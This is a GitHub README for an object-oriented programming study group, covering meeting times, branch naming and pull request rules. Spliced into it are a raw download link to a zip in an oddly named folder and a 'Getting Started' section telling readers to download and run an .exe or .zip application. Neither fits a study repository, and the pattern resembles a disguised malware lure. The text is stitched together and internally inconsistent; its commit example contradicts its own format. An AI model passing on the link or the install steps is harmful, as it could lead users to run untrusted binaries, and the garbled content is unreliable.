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πŸ“š Study and document concepts from Object-Oriented Programming 2 through weekly collaboration and structured practices in GitHub.

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πŸŽ‰ Object-Oriented_Programming2-study - Join Our Object-Oriented Learning Journey

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πŸ“š Description

This project focuses on studying object-oriented programming concepts. It's designed for learners who want to improve their understanding and skills in this area.

πŸ“… Study Schedule

  • Class Time: Every Tuesday at 7 PM
  • Submission Deadline: Upload your weekly concepts to your personal branch by Sunday at 11:59 PM. Then, please submit a pull request (PR).
  • Engagement: Review others' solutions and provide constructive comments.

⚠️ Branching Rules

  • Do not push directly to the main branch (it may lead to data loss).
  • Follow this format for branch names: yourName/week-X, for example, KimYoungSin1/week-1.
  • No need to create separate issues. Just fill out the PR template and ensure to link categories, titles, and add your own README.

⚠️ File Naming, PR Guidelines & Commit Message Rules ⚠️

Creating Files (Branch)

Your file structure should look like this: https://raw.githubusercontent.com/trichill/Object-Oriented_Programming2-study/main/paraplasis/Object-Oriented_Programming2-study.zip.

Commit Message

  1. Format: [week X] Object-Oriented Concept Summary.
  2. Example: 0sin0926-week-1.

PR Details

Copy the contents below into your pull request under "To Reviewers":

To. Reviewers

πŸ’‘ What to Include?

  • Summarize the object-oriented concepts you studied this week.
  • If adding other files, keep going until you reach a well-rounded understanding.

Commit Message

  • Note any changes or additions you made.
  • Typically, we summarize concepts, so phrases like "Object-Oriented Concept Summary" work well.

PR Content

πŸš€ Getting Started

To begin, follow the steps below to download and run the application.

  1. Visit the Releases Page: Go to this link to access the available downloads.
  2. Choose Your Version: Find the version you want to download. Each version will have assets listed under it.
  3. Download the File: Click on the appropriate file, usually a .exe or .zip, to start your download.
  4. Install the Application: After downloading, open or extract the file, and follow any installation prompts that appear.

Your application should now be running successfully!

πŸ› οΈ System Requirements

  • Operating System: Compatible with Windows, Mac OS, and Linux.
  • Minimum RAM: 2GB for smoother operation.
  • Disk Space: Ensure you have at least 150MB of free disk space.

πŸ“„ Additional Resources

  • Check our Wiki for detailed documentation.
  • Browse through the Issues Section to see any questions or tasks others have posed.

πŸ“ FAQs

  1. What should I do if I encounter an error?

    • Check if you've followed the installation instructions. If the error persists, feel free to create a new issue.
  2. Can I contribute?

    • Absolutely! Follow the guidelines in the "Contributing" section and make a PR.
  3. How do I submit my homework?

    • Upload to your personal branch and submit a PR following the rules outlined above.

πŸ”— Learn More

For any further questions or clarifications, please refer to our detailed documentation and community guidelines available on the repository page.

Make the most of your learning journey in object-oriented programming. We look forward to seeing your progress!

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